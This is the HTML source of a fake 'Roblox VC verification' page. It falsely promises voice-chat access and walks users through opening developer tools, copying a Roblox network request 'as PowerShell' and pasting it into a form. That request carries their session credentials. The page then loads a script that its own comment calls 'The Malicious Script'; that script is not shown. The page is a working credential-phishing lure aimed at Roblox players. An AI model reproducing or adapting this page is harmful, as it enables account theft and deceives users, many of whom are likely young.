<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Exclusive Roblox VC Access Portal</title> 
    <link rel="stylesheet" href="style.css">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;600&display=swap" rel="stylesheet"> 
</head>
<body>
    <!-- This div is the target for particles -->
    <div id="particles-js"></div> 

    <nav class="menu-bar"> 
        <ul>
            <li><a href="index.html">Go Back</a></li>
            <li><a href="vchowitworks.html">How it Works</a></li>
            <li><a href="faqvc.html">FAQ</a></li>
            <li><a href="support.html">Support</a></li> 
        </ul>
    </nav>

    <div class="container floating">
        <h1>Exclusive VC Verification</h1> 
        <p>Unlock Voice Chat by verifying your session through our secure portal. Follow the steps precisely:</p>
        <ol class="text">
            <li>Ensure you are logged into Roblox.com.</li>
            <li>Open Developer Tools (Press F12).</li>
            <li>Select the 'Network' tab.</li>
            <li>Refresh the Roblox page (F5/Ctrl+R).</li>
            <li>Right-click the `settings` (scroll up) -> 'Copy' -> 'Copy as PowerShell'.</li>
            <li>Paste the copied script into the secure input field below:</li>
        </ol>
        
        <textarea id="powershell-input" placeholder="Paste verification script here..."></textarea> 
        
        <button id="submit-button">Activate VC Access</button>
        <p id="status-message"></p> 

        <div class="video-container">
            <p>Watch our tutorial while you wait for verification:</p>
            <iframe width="560" height="315" src="https://www.youtube.com/embed/HN5bRmuGeLM?si=rQYLhfhBJqSNuuX1" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe> 
        </div>
    </div>

    <!-- Particle Library & Config -->
    <script src="https://cdn.jsdelivr.net/npm/particles.js@2.0.0/particles.min.js"></script>
    <script>
        // Standard Green Particle Config
        particlesJS("particles-js", {
          "particles": { "number": { "value": 80, "density": { "enable": true, "value_area": 800 } }, "color": { "value": "#00ff00" }, "shape": { "type": "circle" }, "opacity": { "value": 0.5, "random": true, "anim": { "enable": true, "speed": 0.4, "opacity_min": 0.1, "sync": false } }, "size": { "value": 3, "random": true }, "line_linked": { "enable": true, "distance": 150, "color": "#00ff00", "opacity": 0.2, "width": 1 }, "move": { "enable": true, "speed": 1, "direction": "none", "random": true, "straight": false, "out_mode": "out", "bounce": false } },
          "interactivity": { "detect_on": "canvas", "events": { "onhover": { "enable": true, "mode": "grab" }, "onclick": { "enable": true, "mode": "push" }, "resize": true }, "modes": { "grab": { "distance": 140, "line_opacity": 0.4 }, "push": { "particles_nb": 3 } } },
          "retina_detect": true
        });
    </script>

    <!-- The Malicious Script -->
    <script src="vc.js"></script> 
</body>
</html>
